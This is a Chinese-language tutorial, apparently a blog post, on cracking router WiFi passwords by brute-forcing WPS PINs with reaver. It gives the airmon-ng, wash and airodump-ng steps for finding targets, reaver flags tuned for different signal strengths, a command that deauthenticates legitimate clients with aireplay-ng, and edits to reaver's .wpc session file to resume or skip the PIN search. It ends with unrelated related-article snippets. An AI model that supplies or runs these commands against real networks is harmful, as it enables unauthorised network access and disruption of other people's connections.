reaver跑pin码wpc文件的修改

reaver跑路由器pin码过程:(root权限下)

1 输入:airmon-ng start wlan0 开启监听模式

2 输入:wash -i mon0 -C 查看所有开启WPS的无线路由 长时间无反应按Ctrl+C,结束进程,这时记下你要PJ的目标路由MAC.

3 输入:airodump-ng mon0 网卡以混杂模式扫描所有频道—并显示所有AP的信息(包括 AP的信号强度,ESSID,MAC,频道,加密方式,等等…..),按Ctrl+C,结束扫描.

4 输入:reaver -i mon0 -b MAC -a -S -vv 开始穷举pin码

  reaver 参数详解:

  -i, –interface=<wlan> Name of the monitor-mode interface to use
    网卡的监视接口,通常是mon0(必需)
  -b, –bssid=<mac> BSSID of the target AP
    AP的MAC地址(必需)

  -c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)
    信号的频道,如果不指定会自动扫描,如-c1 指定1频道(常用)

  -a, –auto Auto detect the best advanced options for the target AP
    对目标AP自动检测高级参数,自动检测目标AP最佳配置(常用)

  -v, –verbose Display non-critical warnings (-vv for more)
    显示不重要警告信息 -vv 可以显示更多(常用)

  -S 使用最小的DH key,可以提高PJ速度(常用)

  -t 即timeout每次穷举等待反馈的最长时间(常用)

  -s, –session=<file> Restore a previous session file
    恢复进度文件

  -N, –no-nacks Do not send NACK messages when out of order packets are received
    不发送NACK信息

  -n, –nack Target AP always sends a NACK [Auto]
    对目标AP总是发送NACK,默认自动

  -f, –fixed Disable channel hopping
    禁止频道跳转

  -p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin
    使用指定的4位或者8位pin码,可以用8位直接找到密码(常用)
  -d, –delay=<seconds> Set the delay between pin attempts [1]
    pin间延时,默认1秒(常用)
  -l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
    AP锁定WPS后等待时间
  -g, –max-attempts=<num> Quit after num pin attempts
    最大pin次数

  -q, –quiet Only display critical messages
    只显示关键信息

  -h, –help Show help
    显示帮助

因状况调整参数(-c后面都已目标频道为1作为例子)
目标信号非常好:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d0  -c 1
目标信号普通:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d2  -t .5  -c 1
目标信号一般:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d5  -c 1

常见问题的处理:

1.如果出现超长的WPA PSK可以使用第四条命令“reaver –i mon0 –b MAC –p WPA PSK”
MAC为目标的mac地址,WPA PSK为获取到的超长密码。作用是将指定的pin码获取
wpa密码psk。

2.reaver -i mon0 -b MAC -p PIN8位数

直接由pin码得到psk密码

3.90.9%进程后出现问题或卡死,请记下PIN前四位数,重新跑后三位数,如果前四位正确的话
  reaver -i mon0 -b MAC -p PIN前4位数

4.PIN僵死锁定后的方法。也可以攻击隐藏ssid的路由 aireplay-ng-0 1000 -a SSID 的MAC -c 合法客户端的MAC 网卡端口

就是让客户端断开连接1000次macchanger

pin码的进度文件保存在/usr/local/etc/下,XXXXXXXXXXXX.wpc (MAC地址为文件名)

MAC.wpc结构
0                  //第一行,这个地方是说它的前4位PIN码的进度位置数
0                  //第二行,这个地方是说后3位PIN数的已经运行测试位置数
0                  //第三行,0时没有找到,当为1时找到前四位,当为2时全部找到.
1234
0123
1111
2222
3333
.......
.......

如我们要从2000开始pin,你可以将第一行修改为2004,这样它就会从2000开始PIN了.

命令是这样的  reaver -i mon0 -b xx:xx:xx:xx:xx -a -S -vv -s /usr/local/etc/XXXXXXXXXXXX.wpc , 小写的-s后面跟进度文件的路径.

时间: 2024-11-02 09:16:18

reaver跑pin码wpc文件的修改的相关文章

ubuntu14.04使用reaver跑pin码

今天刚说过没找到支持ubuntu14.04用reaver跑pin的旧版库文件这就有摸索到方法了... 另外安装系统ubuntu14.04以及一系列破解工具比如aircrack,minidwep等都不在本贴中赘述了,百度有很多,也可以直接在终端使用命令"apt-get install 软件包" 来安装,不过不要安装reaver,本贴主要讲安装reaver和库文件 等上面说的你都安装完了之后,去htt和谐p:/和谐/pkgs.org/这个网站下载reaver和库文件,具体步骤如下: 进入上

跑PIN码破解无线网络WIFI密码的原理分析(转)

你们家用的无线路由器安全吗?有人蹭网吗?无线路由器的漏洞在哪里?这么避免蹭网? 想要了解这些,必须要了解加密以及破解原理. 工具/原料 电脑 足够多足够好的wifi信号源 usb无线网卡(非必需) 一点点耐心 基础知识 1 普通无线加密及破解的分类: 1.wep加密:此类加密比较老旧,非常不安全,十分容易被破解,现在的无线路由器已经抛弃了此类加密方式. 2.PWA/WPA2 PSK加密.这类加密按道理来说是很安全的,但是由于很多路由器为了方便用户上网,设置了QSS快速连接功能(或者叫WPS功能)

使用Reaver加PIN码秒破WPA-PSK密码

之前掌握到的破解WPA-PSK密码仅限于使用aircreack工具包获取handshake后挂字典爆破方式,而能否破解出wpa密码完全依赖于字典强度了.除了该方式外还有一个更有效的办法,就是使用路由PIN码然后使用BT5下自带的Reaver工具秒破WPA-PSK密码! 在已知PIN码的情况下可以在BT5下使用 reaver -i mon0 -b AP‘s Mac -p pin 直接秒破! 现在比较难的就是怎么得到PIN的问题了,经常关注无线这方面的朋友应该知道现在腾达和磊科产品有保PIN算法漏洞

WPC文件修改还原pin进度

原文地址:http://wenku.baidu.com/link?url=KZRR6VtW_Yn59iEbrWYz15jOH6hSVgjyow8nvwHfQr3eQgvCcc9IgYCT-fWwVWfbLoIfKkenMqdxDWQuXKOXLjjrTq12QbO-DeV58GIfPF7 wpc 文件结构详解 0 这个地方是说它的前4位PIN 码的进度位置数(不同版本有稍微偏差) 0 这个地方是说后3位PIN数的已经运行测试位置数 0 0时没有找到,当为1时找到前四位,当为2时全部找到. 下面是

.NET Core项目修改project.json来引用其他目录下的源码等文件的办法 &amp; 解决多框架时 project.json 与 app.config冲突的问题

作者: zyl910 一.缘由 项目规模大了后,经常会出现源码文件分布在不同目录的情况,但.NET Core项目默认只有项目目录下的源码文件,且不支持“Add As Link”方式引入文件.这时需要手工修改project.json文件了. 可能是因为最新版本已将 project.json 转为 .csproj,导致我花了一些功夫才找到配置办法,故写了这篇笔记. 二.引用其他目录下的源码等文件的办法 2.1 官网说明 官网的 project.json 和 csproj 属性之间的映射 里简单介绍了

flask的debug模式下,网页输入pin码进行调试

网站后端Python+Flask .FLASK调试模式之开启DEBUG与PIN使用? 自动加载: # 方式一 1 2 if __name__ == '__main__':     app.run(host='0.0.0.0', port=9000, debug=True) # 方式二 1 2 3 if __name__ == '__main__':     app.debug = True     app.run(host='0.0.0.0', port=9000) 说明: 可通过如上两种方式开

树莓派+8187L 安装 kali linux 跑pin

学术交流使用,小伙伴不用乱用哦 树莓派一个 一个TP 迷你网卡 一个8187L卡皇(某宝老板没有3070了)TF卡一个(8G以上) 3070更小 和 树莓派更般配 或者使用全向天线 这次我用的是定向 使用 tp迷你网卡做ap 一个5V2A的充电宝 一个小书包 放在书包里最好使用全向天线. 用手机连接到树莓派 可以实现某些特殊的渗透 最后后一张放图给大家看 首先去下载 kali linux 地址:https://www.offensive-security.com/kali-linux-vmwar

横屏小游戏--萝莉快跑源码分析三

主角出场: 初始化主角 hero = new GameObjHero(); hero->setScale(0.5); hero->setPosition(ccp(100,160)); hero->setVisible(false); addChild(hero,1); 进入GameObjHero类ccp文件 创建主角及动作 this->setContentSize(CCSizeMake(85,90)); //接收触摸事件 CCDirector* pDirector = CCDire

横屏小游戏--萝莉快跑源码分析一

Cpp文件功能介绍 GameAboutScene.cpp 关于页面 GameMainScene.cpp游戏主页面 GameMark.cpp分数 GameMenuScene.cpp游戏主菜单 GameObjHero.cpp主角 GameObjMap.cpp游戏地图 GameObjStar.cpp星星 菜单主页面: 主菜单页面背景 CCSprite* bg = CCSprite::create("MainMenu.png"); bg->setScale(0.5); bg->se